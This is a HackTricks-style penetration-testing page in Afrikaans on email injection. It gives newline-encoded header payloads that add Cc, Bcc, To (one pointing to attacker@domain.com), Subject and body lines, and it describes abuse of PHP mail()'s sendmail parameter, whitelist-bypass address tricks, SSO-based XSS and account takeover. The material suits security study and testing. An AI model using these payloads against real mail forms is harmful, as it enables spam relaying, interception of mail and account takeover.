# Email Injections

<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>

\
Gebruik [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections) om maklik **werkvloei** te bou en te **automate** wat aangedryf word deur die wêreld se **mees gevorderde** gemeenskap gereedskap.\
Kry Toegang Vandag:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}

{% hint style="success" %}
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## Inject in gestuurde e-pos

### Inject Cc en Bcc na sender argument
```
From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com
```
Die boodskap sal na die ontvanger en ontvanger1 rekeninge gestuur word.

### Inject argument
```
From:sender@domain.com%0ATo:attacker@domain.com
```
Die boodskap sal na die oorspronklike ontvanger en die aanvaller rekening gestuur word.

### Injeksie Onderwerp argument
```
From:sender@domain.com%0ASubject:This is%20Fake%20Subject
```
Die vals onderwerp sal by die oorspronklike onderwerp gevoeg word en in sommige gevalle dit vervang. Dit hang af van die e-posdiens se gedrag.

### Verander die liggaam van die boodskap

Inspuit 'n twee-lyn voeding, skryf dan jou boodskap om die liggaam van die boodskap te verander.
```
From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.
```
### PHP mail() funksie eksploitering
```bash
# The function has the following definition:

php --rf mail

Function [ <internal:standard> function mail ] {
- Parameters [5] {
Parameter #0 [ <required> $to ]
Parameter #1 [ <required> $subject ]
Parameter #2 [ <required> $message ]
Parameter #3 [ <optional> $additional_headers ]
Parameter #4 [ <optional> $additional_parameters ]
}
}
```
#### Die 5de parameter ($additional\_parameters)

Hierdie afdeling gaan gebaseer wees op **hoe om hierdie parameter te misbruik, veronderstel dat 'n aanvaller dit beheer**.

Hierdie parameter gaan by die opdraglyn gevoeg word wat PHP gaan gebruik om die binêre sendmail aan te roep. Dit sal egter gesuiwer word met die funksie `escapeshellcmd($additional_parameters)`.

'n Aanvaller kan **uittrekparameters vir sendmail inspuit** in hierdie geval.

#### Verskille in die implementering van /usr/sbin/sendmail

**sendmail** koppelvlak word **verskaf deur die MTA e-pos sagteware** (Sendmail, Postfix, Exim ens.) wat op die stelsel geïnstalleer is. Alhoewel die **basiese funksionaliteit** (soos -t -i -f parameters) dieselfde bly vir kompatibiliteitsredes, **verskil ander funksies en parameters** baie, afhangende van die geïnstalleerde MTA.

Hier is 'n paar voorbeelde van verskillende manbladsye van die sendmail opdrag/koppelvlak:

* Sendmail MTA: http://www.sendmail.org/\~ca/email/man/sendmail.html
* Postfix MTA: http://www.postfix.org/mailq.1.html
* Exim MTA: https://linux.die.net/man/8/eximReferences

Afhangende van die **oorsprong van die sendmail** binêre is verskillende opsies ontdek om dit te misbruik en l**eak lêers of selfs arbitrêre opdragte** uit te voer. Kyk hoe in [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)

## Inspuit in die e-pos naam

### Geignoreerde dele van 'n e-pos

Die simbole: **+, -** en **{}** kan in seldsame gevalle gebruik word vir etikettering en word deur die meeste e-pos bedieners geignoreer.

* Byvoorbeeld: john.doe+intigriti@example.com → john.doe@example.com

**Kommentaar tussen hakies ()** aan die begin of die einde sal ook geignoreer word.

* Byvoorbeeld: john.doe(intigriti)@example.com → john.doe@example.com

### Whitelist omseiling

<figure><img src="../.gitbook/assets/image (812).png" alt="https://www.youtube.com/watch?app=desktop&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>

### Aanhalings

<figure><img src="../.gitbook/assets/image (626).png" alt="https://www.youtube.com/watch?app=desktop&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>

### IP's

Jy kan ook IP's as domeinnames tussen vierkante hakies gebruik:

* john.doe@\[127.0.0.1]
* john.doe@\[IPv6:2001:db8::1]

### Ander kwesbaarhede

![https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](<../.gitbook/assets/image (1131).png>)

## Derdeparty SSO

### XSS

Sommige dienste soos **github** of **salesforce laat** jou toe om 'n **e-pos adres met XSS payloads daarop** te skep. As jy **hierdie verskaffers kan gebruik om in te log op ander dienste** en hierdie dienste **nie korrek sanitiseer** die e-pos nie, kan jy **XSS** veroorsaak.

### Rekening-Oorname

As 'n **SSO diens** jou toelaat om **'n rekening te skep sonder om die gegewe e-pos adres te verifieer** (soos **salesforce**) en dan kan jy daardie rekening gebruik om **in te log in 'n ander diens** wat **vertrou** op salesforce, kan jy enige rekening toegang.\
Let daarop dat salesforce aandui of die gegewe e-pos verifieer is of nie, maar die toepassing moet hierdie inligting in ag neem.

## Antwoord-Na

Jy kan 'n e-pos stuur met _**From: company.com**_ en _**Replay-To: attacker.com**_ en as enige **outomatiese antwoord** gestuur word omdat die e-pos **van** 'n **interne adres** gestuur is, mag die **aanvaller** in staat wees om daardie **antwoord** te **ontvang**.

## Hard Bounce Tarief

Sekere dienste, soos AWS, implementeer 'n drempel bekend as die **Hard Bounce Tarief**, wat tipies op 10% gestel word. Dit is 'n kritieke maatstaf, veral vir e-pos afleweringsdienste. Wanneer hierdie tarief oorskry word, kan die diens, soos AWS se e-pos diens, opgeskort of geblokkeer word.

'n **hard bounce** verwys na 'n **e-pos** wat aan die sender teruggestuur is omdat die ontvanger se adres ongeldig of nie-bestaande is. Dit kan om verskeie redes gebeur, soos die **e-pos** wat na 'n nie-bestaande adres gestuur word, 'n domein wat nie werklik is nie, of die ontvanger se bediener se weiering om **e-posse** te aanvaar.

In die konteks van AWS, as jy 1000 e-posse stuur en 100 daarvan lei tot hard bounces (as gevolg van redes soos ongeldig adres of domeine), beteken dit 'n 10% hard bounce tarief. Om hierdie tarief te bereik of te oorskry kan AWS SES (Simple Email Service) laat blokkeer of jou e-pos stuur vermoëns opskort.

Dit is van kardinale belang om 'n lae hard bounce tarief te handhaaf om ononderbroke e-pos diens te verseker en sender reputasie te handhaaf. Monitering en bestuur van die kwaliteit van die e-pos adresse in jou poslyste kan aansienlik help om dit te bereik.

Vir meer gedetailleerde inligting kan AWS se amptelike dokumentasie oor die hantering van bounces en klagtes geraadpleeg word [AWS SES Bounce Handling](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#bounce-types).

## Verwysings

* [https://resources.infosecinstitute.com/email-injection/](https://resources.infosecinstitute.com/email-injection/)
* [https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)
* [https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view](https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view)
* [https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0)

{% hint style="success" %}
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Ondersteun HackTricks</summary>

* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>

\
Gebruik [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections) om maklik te bou en **werkvloei te outomatiseer** wat deur die wêreld se **mees gevorderde** gemeenskap gereedskap aangedryf word.\
Kry Toegang Vandag:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}